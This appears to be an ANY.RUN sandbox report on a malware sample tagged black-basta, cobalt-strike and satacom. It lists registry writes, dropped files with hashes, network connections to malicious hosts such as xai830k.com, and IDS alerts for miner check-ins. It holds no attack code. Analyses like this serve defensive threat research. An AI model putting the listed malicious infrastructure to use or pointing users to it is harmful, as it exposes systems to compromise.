(PID) Process:(1352) svchost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileService\References\S-1-5-21-1693682860-607145093-2874071422-1001
Operation:writeName:RefCount
Value:
06000000
(PID) Process:(2996) svchost.exeKey:HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store
Operation:writeName:C:\Users\admin\Desktop\2025-05-15_e2940d084bea169b4fc58b2223162543_black-basta_cobalt-strike_satacom.exe
Value:
5341435001000000000000000700000028000000003806000000000001000000000000000000000A7322000050BB64EDDDACD50100000000000000000200000028000000000000000000000010000000000000000000000000000000D6060000000000000100000001000000
(PID) Process:(2996) svchost.exeKey:\REGISTRY\A\{6a17a03d-78c3-538c-6723-20df7c3620b2}\Root\InventoryApplicationFile
Operation:writeName:WritePermissionsCheck
Value:
1
Executable files
10
Suspicious files
52
Text files
25
Unknown types
1

Dropped files

PID
Process
Filename
Type
2244WerFault.exeC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_explorer.exe_ca33b987d25a196930bd526a662f6da84a30ec_ddf00bea_0e921849-44f0-437b-9470-b4211a511394\Report.wer
MD5:
SHA256:
56402025-05-15_e2940d084bea169b4fc58b2223162543_black-basta_cobalt-strike_satacom.exeC:\Users\admin\AppData\Local\Temp\WinTemp-v4.exeexecutable
MD5:08A7CF2D153892E21BBB5A9F808509A7
SHA256:4625FB654BB72E51D3923AA553A4708EA3B96CA56F36AD5B555D1513D9A611B4
2244WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERC392.tmp.xmlxml
MD5:796D432606948419B0731040FF143F22
SHA256:233CD90605DFEAD1EE97D11F8C8B92B8D30010573D619ACE83390CBAC2BF2258
4988powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nmipk3dg.lhh.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4988powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_53ejmmer.5za.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4988powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:5EFC5F9366BBAF6972B8CD2C7BE9D98C
SHA256:E601FD33F3D941EEEB3899AD1458B2B768A91FBFD96C4403FD7BF55139FEEE7D
2244WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERC362.tmp.WERInternalMetadata.xmlbinary
MD5:0DA4778D34B5991B4238942EE61AF293
SHA256:FF1EBA2F8CA0BD6D117EA1E9A16597AD1A6601D568C87D861F525CA352904ACE
5544powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hezlk0sy.x0s.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2244WerFault.exeC:\Users\admin\AppData\Local\CrashDumps\2025-05-15_e2940d084bea169b4fc58b2223162543_black-basta_cobalt-strike_satacom.exe.5640.dmpbinary
MD5:E9A0A808FF786C905F63C1AC08AC4FE6
SHA256:266466DE816C47EC5230A40BE0409BC54D408BB111E26B451C277C7B70E04B23
1772svchost.exeC:\Windows\Prefetch\UPFC.EXE-BDDF79D6.pfbinary
MD5:09BDFA499C995360CED3BA23057393EB
SHA256:4977105D6E118A25465B6214FE55ADE63C3BD30A596949A7FF51190E4940FA98
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
51
DNS requests
14
Threats
22

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1040
SIHClient.exe
GET
200
23.216.77.20:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1040
SIHClient.exe
GET
200
23.216.77.20:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
1040
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
1040
SIHClient.exe
GET
200
23.216.77.20:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
1040
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
1040
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
1040
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
1040
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
4448
WinTemp-v4.exe
152.89.61.96:443
xai830k.com
Virtual Systems LLC
UA
malicious
4448
WinTemp-v4.exe
45.144.212.77:7777
Bursabil Teknoloji A.S.
UA
malicious
4448
WinTemp-v4.exe
173.231.16.77:443
api64.ipify.org
WEBNX
US
unknown
1040
SIHClient.exe
4.245.163.56:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
1040
SIHClient.exe
23.216.77.20:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1040
SIHClient.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
google.com
  • 142.250.185.142
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
xai830k.com
  • 152.89.61.96
malicious
api64.ipify.org
  • 173.231.16.77
  • 104.237.62.213
unknown
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
crl.microsoft.com
  • 23.216.77.20
  • 23.216.77.25
  • 23.216.77.18
  • 23.216.77.26
  • 23.216.77.27
  • 23.216.77.16
  • 23.216.77.15
  • 23.216.77.28
  • 23.216.77.21
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
4448
WinTemp-v4.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 5
4448
WinTemp-v4.exe
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
Possibly Unwanted Program Detected
ET ADWARE_PUP User-Agent (HTTP)
5416
cmd.exe
Potential Corporate Privacy Violation
ET INFO Cryptocurrency Miner Checkin
Possibly Unwanted Program Detected
ET ADWARE_PUP User-Agent (HTTP)
Possibly Unwanted Program Detected
ET ADWARE_PUP User-Agent (HTTP)
5416
cmd.exe
Potential Corporate Privacy Violation
ET INFO Cryptocurrency Miner Checkin
Possibly Unwanted Program Detected
ET ADWARE_PUP User-Agent (HTTP)
1116
cmd.exe
Potential Corporate Privacy Violation
ET INFO Cryptocurrency Miner Checkin
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
2025-05-15_e2940d084bea169b4fc58b2223162543_black-basta_cobalt-strike_satacom